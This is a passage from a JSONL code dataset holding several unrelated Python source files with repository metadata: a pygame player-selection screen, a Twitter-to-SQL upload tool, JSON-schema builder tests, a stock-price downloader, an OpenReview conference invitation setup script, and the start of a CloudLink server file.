)\n","repo_name":"saalfeldlab/CNNectome","sub_path":"CNNectome/visualization/generate_blur_examples.py","file_name":"generate_blur_examples.py","file_ext":"py","file_size_in_byte":14364,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"18029666799","text":"import pygame\r\nfrom main.StateManager import getManager\r\nfrom state.GameState import GameState\r\nfrom state.PlayState import PlayState\r\nfrom utility.Button import Button\r\nfrom pygame.locals import *\r\nfrom utility.Image import Image\r\nfrom utility.Constants import settingsButtonDim, windowDim, loadImage\r\n\r\nclass SettingsState(GameState):\r\n \r\n pressed = False\r\n \r\n def __init__(self):\r\n self.players = -1\r\n centerx = windowDim / 2 \r\n \r\n #BG\r\n self.images = pygame.sprite.RenderPlain()\r\n bgImage, bgRect = loadImage(\"BG.png\")\r\n bg = Image(bgImage, bgRect)\r\n self.images.add(bg)\r\n\r\n #Initialize Buttons\r\n self.buttons = pygame.sprite.RenderPlain()\r\n self.twoPlayersButton = Button(centerx, 150, settingsButtonDim, \"2PlayerButton.png\")\r\n self.threePlayersButton = Button(centerx, 300, settingsButtonDim, \"3PlayerButton.png\")\r\n self.fourPlayersButton = Button(centerx, 450, settingsButtonDim, \"4PlayerButton.png\")\r\n \r\n self.buttons.add(self.twoPlayersButton, self.threePlayersButton, self.fourPlayersButton)\r\n \r\n def update(self):\r\n players = -1\r\n \r\n for event in pygame.event.get(): \r\n if event.type == QUIT:\r\n return False\r\n \r\n currPressed = pygame.mouse.get_pressed()[0]\r\n \r\n for button in self.buttons:\r\n button.update(currPressed)\r\n \r\n released = not currPressed and self.pressed\r\n \r\n if released:\r\n if self.twoPlayersButton.mouseIn():\r\n players = 2\r\n if self.threePlayersButton.mouseIn():\r\n players = 3\r\n if self.fourPlayersButton.mouseIn():\r\n players = 4\r\n \r\n if players is not -1:\r\n getManager().set(PlayState(players))\r\n \r\n self.pressed = currPressed\r\n return True\r\n \r\n def render(self, screen):\r\n self.images.draw(screen)\r\n self.buttons.draw(screen)","repo_name":"XeraRequiem/Disc-Wars","sub_path":"state/SettingsState.py","file_name":"SettingsState.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10452079276","text":"import json\r\nimport os\r\nimport re\r\nimport sys\r\nimport glob\r\nimport pytz\r\n\r\n__UTC__ = pytz.UTC\r\n\r\nfrom datetime import datetime, timezone\r\nfrom psycopg2 import extras as ext\r\nfrom psycopg2.extras import Json\r\nfrom pprint import pprint\r\nfrom tqdm import tqdm\r\n\r\nfrom twitter2sql.core import sql_statements\r\nfrom twitter2sql.core.util import clean, get_last_modified, \\\r\n within_time_bounds, open_database, close_database, \\\r\n get_column_header_dict\r\n\r\n\r\n# CREATE_TABLE_STMT = sql_statements.CREATE_TABLE_STMT\r\n# INSERT_TWEET_STMT = sql_statements.INSERT_TWEET_STMT\r\n\r\n\r\n\"\"\"1. Configure parameters\r\n\r\nText search\r\nThis will search the full text of the tweet, any retweeted_status text, and any\r\n quoted_status text.\r\n\r\n`search_text`: set to True if you want to use text search\r\n`keywords`: add the keywords you want to match here\r\n`all_keywords`: whether to check for all keywords. If true, it will match only\r\n tweets that have all keywords. If false it will check whether any of the \r\n keywords exist\r\n\r\n\"\"\"\r\n\r\n\r\n# @profile\r\ndef upload_twitter_2_sql(database_name,\r\n db_config_file,\r\n twitter_json_folders,\r\n table_format_csv,\r\n table_name='example_table',\r\n owner='example',\r\n admins=[],\r\n search_text=False,\r\n keywords=['keyword1', 'keyword2'],\r\n all_keywords=False,\r\n match_dates=True,\r\n start_time=None,\r\n end_time=datetime.utcnow().replace(tzinfo=timezone.utc),\r\n use_regex_match=False,\r\n reg_expr='example_regex',\r\n overwrite_db=True,\r\n overwrite=True,\r\n timestamp='modified',\r\n json_mode='newline'):\r\n \r\n create_table_statement = sql_statements.create_table_statement(table_format_csv, table_name)\r\n insert_table_statement = sql_statements.insert_statement(table_format_csv, table_name)\r\n database, cursor = open_database(database_name, db_config_file, overwrite_db, owner, admins)\r\n\r\n if overwrite:\r\n # This errors if the tweets table does not yet exist.\r\n # Fix that!\r\n cursor.execute(\"DROP TABLE IF EXISTS tweets;\")\r\n pass\r\n else:\r\n # Not sure what should happen in this case.\r\n print('Table already exists, and overwrite=False. Exiting.')\r\n return\r\n cursor.execute(create_table_statement)\r\n database.commit()\r\n\r\n # Add admins to the table.\r\n admin_add_statement = sql_statements.table_permission_statement(table_name, admins)\r\n cursor.execute(admin_add_statement)\r\n database.commit()\r\n\r\n column_header_dict = get_column_header_dict(table_format_csv)\r\n\r\n try:\r\n\r\n # Keep track of how many tweets have been inserted (just make sure it's running)\r\n total_tweets_inserted = 0\r\n\r\n # Process each folder\r\n for folder_path in twitter_json_folders:\r\n\r\n # Make sure only valid .json files are processed\r\n json_files_to_process = glob.glob(os.path.join(folder_path, '*.json'))\r\n\r\n # Filter to only include files within the date range:\r\n # this specifically filters out JSON files by the file's last modified time (UNIX timestamp), only keeping\r\n # files written on or after the early time bound and on or before the late time bound plus one day\r\n # (to allow time for tweets to be written to the file)\r\n if match_dates:\r\n \r\n json_files_to_process = sorted(json_files_to_process, key=lambda json_file: get_last_modified(os.path.abspath(json_file)))\r\n\r\n print(\"{} JSON files before time filtering: from {} to {}\".format(\r\n len(json_files_to_process), json_files_to_process[0], json_files_to_process[-1]))\r\n\r\n json_files_to_process = [json_file for json_file in json_files_to_process if within_time_bounds(os.path.abspath(json_file), start_time, end_time)]\r\n \r\n print(\"{} JSON files after time filtering: from {} to {}\".format(\r\n len(json_files_to_process), json_files_to_process[0], json_files_to_process[-1]))\r\n\r\n progress_bar = tqdm(json_files_to_process, desc='0/0 tweets inserted')\r\n for idx, json_file in enumerate(progress_bar):\r\n # For each file, extract the tweets and add the number extracted to the total_tweets_inserted\r\n total_tweets_inserted += extract_json_file(os.path.join(folder_path, json_file), cursor, database, keywords,\r\n search_text, all_keywords, insert_table_statement, match_dates, start_time, end_time, use_regex_match, \r\n reg_expr, column_header_dict, json_mode=json_mode)\r\n\r\n progress_bar.set_description(\"{fnum}/{ftotal_tweets_inserted}: {tnum} tweets inserted\".format(fnum=idx, ftotal_tweets_inserted=(len(json_files_to_process) + 1), tnum=total_tweets_inserted))\r\n sys.stdout.flush()\r\n\r\n # Close everything\r\n close_database(cursor, database)\r\n\r\n except KeyboardInterrupt:\r\n close_database(cursor, database)\r\n except Exception:\r\n close_database(cursor, database)\r\n raise\r\n\r\n return\r\n\r\n\r\n# @profile\r\ndef extract_json_file(json_file_path, cursor, database, keywords, search_text, \r\n all_keywords,\r\n insert_table_statement,\r\n match_dates=True,\r\n start_time=None,\r\n end_time=datetime.utcnow().replace(tzinfo=timezone.utc),\r\n use_regex_match=False,\r\n reg_expr='example_regex',\r\n column_header_dict=None,\r\n json_mode='newline'):\r\n\r\n with open(json_file_path, 'r') as infile:\r\n queue = []\r\n\r\n if json_mode == 'newline':\r\n lines = [line for line in infile if (line and len(line) >= 2)] # ????\r\n elif json_mode == 'list':\r\n lines = json.load(infile)\r\n\r\n for line in lines:\r\n\r\n # Load the tweet string into a dictionary.\r\n # There's like one tweet in one json file that is bad json, so I've just been skipping\r\n # it. If there end up being a lot, we should probably figure out why that's happening.\r\n try:\r\n if json_mode == 'newline':\r\n tweet = json.loads(line)\r\n else:\r\n tweet = line\r\n \r\n # Make sure that the tweet matches all filtering parameters\r\n if matches_parameters(tweet, search_text, keywords, all_keywords, match_dates, \r\n start_time, end_time, use_regex_match, reg_expr):\r\n tweet_row = extract_tweet(tweet, column_header_dict)\r\n \r\n if tweet_row:\r\n queue.append(tweet_row)\r\n \r\n except ValueError as e:\r\n print(\"Bad JSON\")\r\n print(\"Error: {}\".format(e))\r\n print(line)\r\n \r\n # Insert all the extracted tweets into the database\r\n try:\r\n ext.execute_batch(cursor, insert_table_statement, queue)\r\n except Exception as e:\r\n print(json_file_path)\r\n raise(e)\r\n \r\n # Just to keep track of how many have been inserted\r\n return len(queue)\r\n\r\n\r\n# @profile\r\ndef matches_parameters(tweet, \r\n search_text=False,\r\n keywords=['keyword1', 'keyword2'],\r\n all_keywords=False,\r\n match_dates=True,\r\n start_time=None,\r\n end_time=datetime.utcnow().replace(tzinfo=timezone.utc),\r\n use_regex_match=False,\r\n reg_expr='example_regex'):\r\n \r\n # Keyword filtering \r\n if search_text:\r\n # Make a list of fields to check for keyword matches (could add user_description, etc.)\r\n keyword_texts = [get_complete_text(tweet)]\r\n\r\n def matches_keywords(text):\r\n matches = get_matching_keywords(text, keywords)\r\n\r\n if all_keywords:\r\n return matches == keywords # only return True if all keywords matched\r\n else:\r\n return bool(matches) # return True if there's at least one match\r\n\r\n keyword_matches = [matches_keywords(keyword_text) for keyword_text in keyword_texts]\r\n\r\n if not any(keyword_matches):\r\n return False\r\n\r\n # Time interval filtering\r\n \r\n if match_dates:\r\n created_at = get_nested_value(tweet, \"created_at\")\r\n created_ts = __UTC__.localize(datetime.strptime(created_at[0:19] + created_at[25:], \"%a %b %d %H:%M:%S %Y\"))\r\n \r\n if not created_ts or created_ts < start_time or created_ts > end_time:\r\n return False\r\n \r\n \"\"\"\r\n Regex matching. This part may not be functional, review --ALB.\r\n \"\"\"\r\n \r\n if use_regex_match:\r\n # Make a list of fields to check for keyword matches\r\n regex_texts = [get_complete_text(tweet)]\r\n regex_matches = [bool(re.search(reg_expr, text)) for text in regex_texts]\r\n if not any(regex_matches):\r\n return False\r\n \r\n return True\r\n\r\n\r\n# @profile\r\ndef get_complete_text(tweet):\r\n\r\n \"\"\" Previously, strings in complete_text had been encoded into\r\n utf-8. I undid that, but there may be a reason to put that\r\n back in later. Used the c() function.\r\n \"\"\"\r\n\r\n if 'text' in tweet:\r\n tweet_complete_text = tweet[\"text\"]\r\n else:\r\n tweet_complete_text = tweet['full_text']\r\n\r\n if tweet[\"truncated\"]:\r\n # Applicable to original tweets and commentary on quoted tweets\r\n tweet_complete_text = tweet[\"extended_tweet\"][\"full_text\"]\r\n\r\n # This handles retweets of original tweets and retweets of quoted tweets\r\n if \"retweeted_status\" in tweet:\r\n return_text = \"RT @{username}: {orig_complete_text}\".format(\r\n username=tweet[\"retweeted_status\"][\"user\"][\"screen_name\"],\r\n orig_complete_text=get_complete_text(tweet[\"retweeted_status\"]))\r\n return return_text\r\n\r\n # I am fairly certain that the only way you can quote a tweet is by \r\n # quoting the original tweet; i.e. I don't think you can quote a retweet\r\n elif \"quoted_status\" in tweet:\r\n return_text = \"{qt_complete_text} QT @{username}: {orig_complete_text}\".format(\r\n qt_complete_text=tweet_complete_text,\r\n username=tweet[\"quoted_status\"][\"user\"][\"screen_name\"],\r\n orig_complete_text=get_complete_text(tweet[\"quoted_status\"]))\r\n return return_text\r\n\r\n else:\r\n return tweet_complete_text\r\n\r\n\r\n# @profile\r\ndef get_matching_keywords(search_string, keywords):\r\n\r\n \"\"\" This function uses regular expressions to search for keywords in a tweet.\r\n \"\"\"\r\n\r\n # keyword_regex = r\"(\\b({reg}))|(({reg})\\b)\".format(reg=\"|\".join(keywords))\r\n keywords = [\"(\\\\b\" + x + \"\\\\b)\" if x[0] != '#'\r\n else '(' + x + \"\\\\b)\" for x in keywords]\r\n keyword_regex = r\"({reg})\".format(reg=\"|\".join(keywords))\r\n matches = []\r\n\r\n # Temporary fix for bytes/string mixing in earlier code.\r\n if type(search_string) is bytes:\r\n search_string = search_string.decode('utf-8')\r\n\r\n for match in re.findall(keyword_regex, search_string.lower()):\r\n matches = matches + list([m for m in match if m])\r\n matches = list(set(matches))\r\n return matches\r\n\r\n\r\n# @profile\r\ndef get_nested_value_json(_dict, path, default=None):\r\n # Pull the nested value\r\n value = get_nested_value(_dict, path, default)\r\n\r\n # Return a string of the json dictionary\r\n if value:\r\n return json.dumps(value)\r\n\r\n\r\n# @profile\r\ndef get_nested_value(outer_dict, path_str, default=None):\r\n\r\n \"\"\"\r\n Get a value from the given dictionary by following the path\r\n If the path isn't valid, nothing will be returned.\r\n \"\"\"\r\n\r\n # get a list of nested dictionary keys (the path)\r\n path = path_str.split(\".\")\r\n current_dict = outer_dict\r\n\r\n # step through the path and try to process it\r\n try:\r\n for step in path:\r\n # If it's actually a list index, convert it to an integer\r\n if step.isdigit():\r\n step = int(step)\r\n\r\n # Get the nested value associated with that key\r\n current_dict = current_dict[step]\r\n\r\n # Once it's at the end of the path, return the nested value\r\n return current_dict\r\n\r\n # The value didn't exist\r\n except (KeyError, TypeError, IndexError):\r\n # pprint(outer_dict)\r\n # print(path_str)\r\n # raise e\r\n pass\r\n\r\n return default\r\n\r\n\r\ndef extract_tweet(tweet, column_header_dict):\r\n # Adding everything to a huge tuple and inserting the tuple to the database\r\n # TODO: Problems here with extended entites.\r\n\r\n entities = tweet[\"entities\"]\r\n extended_entities = None\r\n if 'extended_entities' in tweet:\r\n extended_entities = tweet['extended_entities']\r\n if tweet[\"truncated\"]:\r\n entities = tweet[\"extended_tweet\"][\"entities\"]\r\n if 'extended_entities' in tweet['extended_tweet']:\r\n extended_entities = tweet['extended_tweet']['extended_entities']\r\n elif \"retweeted_status\" in tweet:\r\n if tweet[\"retweeted_status\"][\"truncated\"]:\r\n entities = tweet[\"retweeted_status\"][\"extended_tweet\"][\"entities\"]\r\n if 'extended_entities' in tweet['retweeted_status']['extended_tweet']:\r\n extended_entities = tweet[\"retweeted_status\"][\"extended_tweet\"][\"extended_entities\"]\r\n else:\r\n entities = tweet[\"retweeted_status\"][\"entities\"]\r\n if 'extended_entities' in tweet['retweeted_status']:\r\n extended_entities = tweet[\"retweeted_status\"][\"extended_entities\"]\r\n\r\n item = []\r\n for key, value in column_header_dict.items():\r\n\r\n if key == 'id':\r\n add_item = tweet[\"id\"]\r\n elif key == 'complete_text':\r\n add_item = clean(get_complete_text(tweet))\r\n elif key == 'entities':\r\n add_item = clean(json.dumps(entities))\r\n elif value['type'] == 'timestamp':\r\n time = get_nested_value(tweet, value['instructions'])\r\n add_item = datetime.strptime(time[0:19] + time[25:], \"%a %b %d %H:%M:%S %Y\")\r\n else:\r\n if key == 'video_url_0':\r\n add_item = get_nested_value(entities, value[\"json_fieldname\"])\r\n if add_item is not None:\r\n for variant in add_item:\r\n if variant['content_type'] != 'application/x-mpegURL':\r\n add_item = variant['url']\r\n elif key == 'urls':\r\n add_item = get_nested_value_json(entities, value[\"json_fieldname\"])\r\n elif key == 'photo':\r\n add_item = False\r\n if 'media' in entities:\r\n for media in entities['media']:\r\n if media['type'] == 'photo':\r\n add_item = True\r\n if extended_entities is not None: \r\n if 'media' in extended_entities:\r\n for media in extended_entities['media']:\r\n if media['type'] == 'photo':\r\n add_item = True\r\n elif key == 'video':\r\n add_item = False\r\n if 'media' in entities:\r\n for media in entities['media']:\r\n if media['type'] == 'video':\r\n add_item = True\r\n if extended_entities is not None:\r\n if 'media' in extended_entities:\r\n for media in extended_entities['media']:\r\n if media['type'] == 'video':\r\n add_item = True\r\n elif value['instructions'] == 'entities':\r\n add_item = get_nested_value(entities, value[\"json_fieldname\"])\r\n elif value['instructions'] == 'extended_entities':\r\n add_item = get_nested_value(extended_entities, value[\"json_fieldname\"])\r\n elif value['instructions'] == 'dump_json':\r\n add_item = json.dumps(tweet)\r\n elif value['type'] == 'json':\r\n add_item = get_nested_value_json(tweet, value[\"json_fieldname\"])\r\n else:\r\n add_item = get_nested_value(tweet, value[\"json_fieldname\"])\r\n\r\n if value['clean'] and value['type'] != 'boolean':\r\n add_item = clean(add_item)\r\n\r\n item += [add_item]\r\n\r\n return item\r\n\r\n\r\nif __name__ == '__main__':\r\n upload_twitter_2_sql()","repo_name":"AndrewBeers/Twitter2SQL","sub_path":"twitter2sql/core/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":17147,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"35140197279","text":"from genson import SchemaBuilder\nfrom genson.schema.strategies import SchemaStrategy, Number\nfrom . import base\n\n\nclass MaxTenStrategy(Number):\n KEYWORDS = tuple(list(Number.KEYWORDS) + ['maximum'])\n\n def to_schema(self):\n schema = super().to_schema()\n schema['maximum'] = 10\n return schema\n\n\nclass FalseStrategy(SchemaStrategy):\n KEYWORDS = tuple(list(SchemaStrategy.KEYWORDS) + ['const'])\n\n @classmethod\n def match_schema(self, schema):\n return True\n\n @classmethod\n def match_object(self, obj):\n return True\n\n def to_schema(self):\n schema = super().to_schema()\n schema['type'] = 'boolean'\n schema['const'] = False\n return schema\n\n\nclass MaxTenSchemaBuilder(SchemaBuilder):\n EXTRA_STRATEGIES = (MaxTenStrategy,)\n\n\nclass FalseSchemaBuilder(SchemaBuilder):\n STRATEGIES = (FalseStrategy,)\n\n\nclass TestExtraStrategies(base.SchemaNodeTestCase):\n CLASS = MaxTenSchemaBuilder\n\n def test_add_object(self):\n self.add_object(5)\n self.assertResult({\n '$schema': 'http://json-schema.org/schema#',\n 'type': 'integer',\n 'maximum': 10})\n\n def test_add_schema(self):\n self.add_schema({'type': 'integer'})\n self.assertResult({\n '$schema': 'http://json-schema.org/schema#',\n 'type': 'integer',\n 'maximum': 10})\n\n\nclass TestClobberStrategies(base.SchemaNodeTestCase):\n CLASS = FalseSchemaBuilder\n\n def test_add_object(self):\n self.add_object(\"Any Norwegian Jarlsberger?\")\n self.assertResult({\n '$schema': 'http://json-schema.org/schema#',\n 'type': 'boolean',\n 'const': False}, enforceUserContract=False)\n\n def test_add_schema(self):\n self.add_schema({'type': 'string'})\n self.assertResult({\n '$schema': 'http://json-schema.org/schema#',\n 'type': 'boolean',\n 'const': False}, enforceUserContract=False)\n","repo_name":"wolverdude/GenSON","sub_path":"test/test_custom.py","file_name":"test_custom.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":507,"dataset":"github-code","pt":"37"} +{"seq_id":"33496609967","text":"import pandas_datareader.data as pdr\nimport fix_yahoo_finance as fix\nimport time\nfix.pdr_override()\n\n\ndef get_stock_data(ticker, start_date, end_date):\n \"\"\"\n Gets historical stock data of given tickers between dates\n :param ticker: company, or companies whose data is to fetched\n :type ticker: string or list of strings\n :param start_date: starting date for stock prices\n :type start_date: string of date \"YYYY-mm-dd\"\n :param end_date: end date for stock prices\n :type end_date: string of date \"YYYY-mm-dd\"\n :return: stock_data.csv\n \"\"\"\n i = 1\n try:\n all_data = pdr.get_data_yahoo(ticker, start_date, end_date)\n except ValueError:\n print(\"ValueError, trying again\")\n i += 1\n if i < 5:\n time.sleep(10)\n get_stock_data(ticker, start_date, end_date)\n else:\n print(\"Tried 5 times, Yahoo error. Trying after 2 minutes\")\n time.sleep(120)\n get_stock_data(ticker, start_date, end_date)\n stock_data = all_data[\"Adj Close\"]\n stock_data.to_csv(\"stock_prices.csv\")\n\n\ndef get_sp500(start_date, end_date):\n \"\"\"\n Gets sp500 price data\n :param start_date: starting date for sp500 prices\n :type start_date: string of date \"Y-m-d\"\n :param end_date: end date for sp500 prices\n :type end_date: string of date \"Y-m-d\"\n :return: sp500_data.csv\n \"\"\"\n i = 1\n try:\n sp500_all_data = pdr.get_data_yahoo(\"SPY\", start_date, end_date)\n except ValueError:\n print(\"ValueError, trying again\")\n i += 1\n if i < 5:\n time.sleep(10)\n get_stock_data(start_date, end_date)\n else:\n print(\"Tried 5 times, Yahoo error. Trying after 2 minutes\")\n time.sleep(120)\n get_stock_data(start_date, end_date)\n sp500_data = sp500_all_data[\"Adj Close\"]\n sp500_data.to_csv(\"sp500_data.csv\")\n\n\nif __name__ == \"__main__\":\n get_stock_data(\"AAPL\", \"2018-05-01\", \"2018-06-01\")\n # get_sp500(\"2018-05-01\", \"2018-06-01\")\n","repo_name":"VivekPa/IntroNeuralNetworks","sub_path":"get_prices.py","file_name":"get_prices.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":686,"dataset":"github-code","pt":"37"} +{"seq_id":"2792688877","text":"#!/usr/bin/python\n\n\"\"\"\nA script for managing invitations.\n\nYou can create, enable, or disable most invitations in ICLR 2018 from this script.\n\nUsage:\n\npython toggle-invitations.py Public_Comment --enable\npython toggle-invitations.py Public_Comment --disable\n\"\"\"\n\n# Import statements\nimport argparse\nimport csv\nimport getpass\nimport sys\nimport re\nimport openreview\nfrom openreview import invitations\nfrom openreview import tools\nimport requests\nimport config\nimport pprint\nimport os\n\nconference = 'auai.org/UAI/2018'\nmask_authors_group = conference + \"/Paper/Authors\"\nmask_reviewers_group = conference + \"/Paper/Reviewers\"\nmask_areachair_group = conference + \"/Paper/Area_Chairs\"\nmask_anonac_group = conference + \"/Paper/Area_Chair[0-9]+\"\nmask_anonreviewer_group = conference + \"/Paper/AnonReviewer[0-9]+\"\nmask_allusers_group = conference + \"/Paper/All_Users\"\nmask_unsubmitted_group = conference + \"/Paper/Reviewers/Unsubmitted\"\nmask_submitted_group = conference + \"/Paper/Reviewers/Submitted\"\nprogram_chairs_id = conference + '/Program_Chairs'\nblind_submission_inv_id = conference + '/-/Blind_Submission'\n\ninvitation_templates = {\n 'Official_Comment': {\n 'id': conference + '/-/Paper/Official_Comment',\n 'readers': ['everyone'],\n 'writers': [conference],\n 'invitees': [\n mask_reviewers_group,\n #mask_authors_group,\n mask_areachair_group,\n program_chairs_id],\n 'noninvitees': [mask_unsubmitted_group],\n 'signatures': [conference],\n 'process': os.path.join(os.path.dirname(__file__), '../process/commentProcess.js'),\n 'reply': {\n 'forum': '',\n 'replyto': None,\n 'readers': {\n 'description': 'Select all user groups that should be able to read this comment. Selecting \\'All Users\\' will allow paper authors, reviewers, area chairs, and program chairs to view this comment.',\n 'values-dropdown': [\n #mask_allusers_group,\n #mask_authors_group,\n mask_reviewers_group,\n mask_areachair_group,\n program_chairs_id\n ]\n },\n 'nonreaders': {\n 'values': [mask_unsubmitted_group]\n },\n 'signatures': {\n 'description': '',\n 'values-regex': '|'.join([\n mask_anonreviewer_group,\n #mask_authors_group,\n mask_anonac_group,\n program_chairs_id,\n conference\n ]),\n },\n 'writers': {\n 'description': 'Users that may modify this record.',\n 'values-copied': [conference, '{signatures}']\n },\n 'content': invitations.content.comment\n }\n },\n 'Official_Review': {\n 'id': conference + '/-/Paper/Official_Review',\n 'readers': ['everyone'],\n 'writers': [conference],\n 'invitees': [mask_reviewers_group],\n 'noninvitees': [\n mask_submitted_group,\n mask_areachair_group\n ],\n 'signatures': [conference],\n 'duedate': 1524355199000, # Saturday, April 21, 2018 11:59:59 PM\n 'process': os.path.join(os.path.dirname(__file__), '../process/officialReviewProcess.js'),\n 'reply': {\n 'forum': '',\n 'replyto': '',\n 'readers': {\n 'description': 'The users who will be allowed to read the reply content.',\n 'values': [conference, mask_authors_group, mask_reviewers_group, mask_areachair_group, program_chairs_id]\n },\n 'nonreaders': {\n 'values': [mask_unsubmitted_group]\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': mask_anonreviewer_group\n },\n 'writers': {\n 'description': 'Users that may modify this record.',\n 'values': [conference]\n },\n 'content': invitations.content.review\n }\n },\n 'Meta_Review': {\n 'id': conference + '/-/Paper/Meta_Review',\n 'readers': ['everyone'],\n 'writers': [conference],\n 'invitees': [mask_areachair_group],\n 'noninvitees': [],\n 'signatures': [conference],\n 'process': os.path.join(os.path.dirname(__file__), '../process/metaReviewProcess.js'),\n 'reply': {\n 'forum': '',\n 'replyto': '',\n 'readers': {\n 'description': 'Select all user groups that should be able to read this comment. Selecting \\'All Users\\' will allow paper authors, reviewers, area chairs, and program chairs to view this comment.',\n 'values': [conference, mask_areachair_group, program_chairs_id]\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': mask_anonac_group\n },\n 'writers': {\n 'description': 'Users that may modify this record.',\n 'values-regex': mask_anonac_group\n },\n 'content': {\n 'title': {\n 'order': 1,\n 'value-regex': '.{1,500}',\n 'description': 'Brief summary of your review.',\n 'required': True\n },\n 'recommendation': {\n 'order': 2,\n 'value-radio': [\n '(3) Strong accept',\n '(2) Weak accept',\n '(1) Reject'\n ],\n 'required': True\n },\n 'metareview': {\n 'order': 3,\n 'value-regex': '[\\\\S\\\\s]+',\n 'description': 'Please provide an evaluation of the quality, clarity, originality and significance of this work, including a list of its pros and cons',\n 'required': True\n },\n 'presentation format': {\n 'order': 4,\n 'value-radio': [\n 'Oral',\n 'Poster',\n ],\n 'required': True\n },\n 'best paper':{\n 'order': 5,\n 'description': 'Nominate as best paper (if student paper, nominate for best student paper)',\n 'value-radio': [\n 'Yes',\n 'No'\n ],\n 'required': False\n },\n 'best student paper':{\n 'order': 6,\n 'description': 'Nominate as best student paper',\n 'value-radio': [\n 'Yes',\n 'No'\n ],\n 'required': False\n }\n }\n }\n },\n 'Review_Rating': {\n 'id': conference + '/-/Paper/Review_Rating',\n 'readers': [conference, program_chairs_id, mask_areachair_group],\n 'writers': [conference],\n 'invitees': [\n mask_areachair_group,\n program_chairs_id,\n conference\n ],\n 'noninvitees': [],\n 'signatures': [conference],\n 'duedate': openreview.tools.timestamp_GMT(year=2018, month=5, day=19),\n 'reply': {\n 'forum': '',\n 'replyto': '',\n 'readers': {\n 'description': 'This rating is only visible to the UAI program chairs.',\n 'values': [program_chairs_id]\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': '{}|{}'.format(mask_anonac_group, program_chairs_id)\n },\n 'writers': {\n 'description': 'Users that may modify this record.',\n 'values-regex': '{}|{}'.format(mask_anonac_group, program_chairs_id)\n },\n 'content': {\n 'title': {\n 'value': 'Review ratings for Paper',\n 'description': 'Anonymous ratings of review quality. These will not be shared without your explicit consent.',\n 'order': 0\n },\n 'AnonReviewer1': {\n 'description': 'Rating for this reviewer',\n 'order': 7,\n 'value-radio': [\n '5. Reviewer feedback was very informative, factually correct and constructive.',\n '4. Reviewer feedback was informative but it contained some factual errors or missing points which were later acknowledged.',\n '3. Reviewer feedback was mostly informative, but not entirely accurate.',\n '2. Reviewer feedback was not very informative.',\n '1. Reviewer feedback was incorrect or reviewer did not seem to have read the paper in enough detail.'\n ],\n 'required': True,\n },\n 'AnonReviewer2': {\n 'description': 'Rating for this reviewer',\n 'order': 8,\n 'value-radio': [\n '5. Reviewer feedback was very informative, factually correct and constructive.',\n '4. Reviewer feedback was informative but it contained some factual errors or missing points which were later acknowledged.',\n '3. Reviewer feedback was mostly informative, but not entirely accurate.',\n '2. Reviewer feedback was not very informative.',\n '1. Reviewer feedback was incorrect or reviewer did not seem to have read the paper in enough detail.'\n ],\n 'required': True,\n },\n 'AnonReviewer3': {\n 'description': 'Rating for this reviewer',\n 'order': 9,\n 'value-radio': [\n '5. Reviewer feedback was very informative, factually correct and constructive.',\n '4. Reviewer feedback was informative but it contained some factual errors or missing points which were later acknowledged.',\n '3. Reviewer feedback was mostly informative, but not entirely accurate.',\n '2. Reviewer feedback was not very informative.',\n '1. Reviewer feedback was incorrect or reviewer did not seem to have read the paper in enough detail.'\n ],\n 'required': True,\n },\n }\n }\n },\n 'Final_Decision': {\n 'id': conference + '/-/Paper/Final_Decision',\n 'readers': ['everyone'],\n 'writers': [conference],\n 'invitees': [conference, program_chairs_id],\n 'noninvitees': [],\n 'signatures': [conference],\n 'reply': {\n 'forum': '',\n 'replyto': '',\n 'readers': {\n 'description': 'The readers of this note',\n 'values': [conference, program_chairs_id, mask_authors_group, mask_reviewers_group, mask_areachair_group ]\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values': [program_chairs_id]\n },\n 'writers': {\n 'description': 'Users that may modify this record.',\n 'values': [conference, program_chairs_id],\n },\n 'content': {\n 'title': {\n 'order': 1,\n 'value': 'Paper Final Decision',\n },\n 'decision': {\n 'order': 2,\n 'value-radio': [\n 'Accept',\n 'Reject'\n ],\n 'required': True\n },\n 'comment': {\n 'order': 3,\n 'value-regex': '[\\\\S\\\\s]+',\n 'description': 'Additional commentary about the decision',\n 'required': False\n },\n 'presentation format': {\n 'order': 4,\n 'value-radio': [\n 'Oral',\n 'Poster',\n ],\n 'required': False\n }\n }\n }\n }\n}\n\ndef get_invitation_template(template_id, disable=False):\n invitation_template = invitation_templates[template_id]\n if disable:\n invitation_template['invitees'] = []\n return invitation_template\n\n## Argument handling\nparser = argparse.ArgumentParser()\nparser.add_argument('invitations', nargs='*', help=\"invitation id: \" + \", \".join(invitation_templates.keys()))\nparser.add_argument('--disable', action='store_true', help='if present, disables the given invitation. otherwise, enables the invitation')\nparser.add_argument('--baseurl', help=\"base url\")\nparser.add_argument('--username')\nparser.add_argument('--password')\nargs = parser.parse_args()\n\nif args.invitations == ['all']:\n invitations_to_process = invitation_templates.keys()\nelse:\n invitations_to_process = args.invitations\n\nassert all(id in invitation_templates.keys() for id in args.invitations), \"Invalid invitation. You must choose from the following: {}\".format(invitation_templates.keys())\n\nclient = openreview.Client(baseurl=args.baseurl, username=args.username, password=args.password)\n\npapers = client.get_notes(invitation = 'auai.org/UAI/2018/-/Blind_Submission')\n\nfor paper in papers:\n for template_id in invitations_to_process:\n invitation_template = get_invitation_template(template_id, disable=args.disable)\n new_inv = invitations.from_template(invitation_template, paper)\n client.post_invitation(new_inv)\n\n","repo_name":"openreview/openreview-scripts","sub_path":"venues/auai.org/UAI/2018/python/setup-invitations.py","file_name":"setup-invitations.py","file_ext":"py","file_size_in_byte":14437,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"21662175453","text":"\"\"\"\r\nMikeDEV's CloudLink Server\r\nCloudLink is a websocket extension for Scratch 3.0, which allows MMOs, Web Browsers, BBSs, chats, and more, all using Scratch 3.0. It's cloud variables, but better. \r\nOrigial concept created in 